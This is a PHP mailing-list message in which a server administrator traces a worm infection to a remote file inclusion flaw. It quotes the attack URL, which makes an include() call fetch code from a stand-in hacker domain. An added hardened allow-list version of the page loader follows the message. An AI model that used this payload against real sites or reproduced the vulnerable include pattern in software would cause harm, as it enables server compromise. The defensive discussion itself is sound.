Re: Question on virus/worms

Robert Cummings wrote:
> Did you bother to google any of them? I just punched PHP/BackDoor.gen
> into Google and got a wealth of information.
    Yes, of course!  But what I can see there isn't far from useless
(cf. what I write below).

Stut wrote:
> Seak, Teng-Fong wrote:
>> PHP/Chaploit
> http://vil.nai.com/vil/content/v_129568.htm
>
> [snipped]
    I know these already.  The server is using McAfee.  So I'm quite
familiar with McAfee's VIL.  But the information given by these pages
isn't enough to let me know what to do and how those virus/worms got
inside.
>>     Do they mean anything to anyone of you?  Do you know how they've got
>> inside the computer?  Is there anything to do to prevent that?  Are they
>> known PHP virus/worms to PHP community?
> Most likely means of them getting onto your machine is poorly written
> scripts, over-reliance on scripts downloaded from the web and poor
> server security.
>
> Hope that helps.
    No, not really :-(

    But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.

    Actually, they're using a URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?

    And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");

    This is enough to make infiltration possible!  IMO, this instruction
is supposed to be used like this, isn't it?  So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a total rewrite!  And there's no "poor server
security" that I can see.

    I've installed PHP5 and the problem seems fixed.  However, PHP
writes out where the problem occurs!  Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in
C:\Inetpub\wwwroot\index.php on line X

    I don't want them (the hackers) to be able to read this either.
That gives too much information about my server's file system.  How can
I stop that?

    By the way, I know there're still a lot of servers out there
using PHP4.  Is this vulnerability a known bug?  At least, I wasn't aware
of it before!

    Regards,

    Seak




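The include pattern discussed in this message, beside a hardened form of the same page switcher: an added example, not code from the original thread, written for current PHP rather than the PHP 4/5 of the time. The page names and the pages/ directory are assumptions.

```php
<?php
// Vulnerable pattern from the thread: $page comes straight from the request,
// and with allow_url_fopen enabled (the PHP 4 default) include() fetches and
// executes a remote file. The trailing "?" in the attack URL turns the
// appended ".php" into a query string of the remote request, so the suffix
// is no protection at all.
//   include("$page.php");

// Hardened form: map the request parameter onto a fixed allow-list of local
// templates and never build the include path from user input.
// (Page names and the pages/ directory are assumptions for this example.)
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage(string $requested, string $baseDir): string
{
    // Unknown keys fall back to the default page; no error, no path leak.
    $file = PAGES[$requested] ?? PAGES['home'];
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    // Belt and braces: the resolved file must live inside the template dir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template not found');
    }
    return $path;
}

// The warning quoted in the message is printed because display_errors is on.
// Keep warnings in the log, not in the HTTP response. In php.ini the same
// effect comes from: display_errors = Off, log_errors = On, and remote
// inclusion is switched off with allow_url_fopen = Off and, from PHP 5.2,
// allow_url_include = Off.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
include resolvePage($page, __DIR__ . '/pages');
```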

-- 
PHP Windows Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

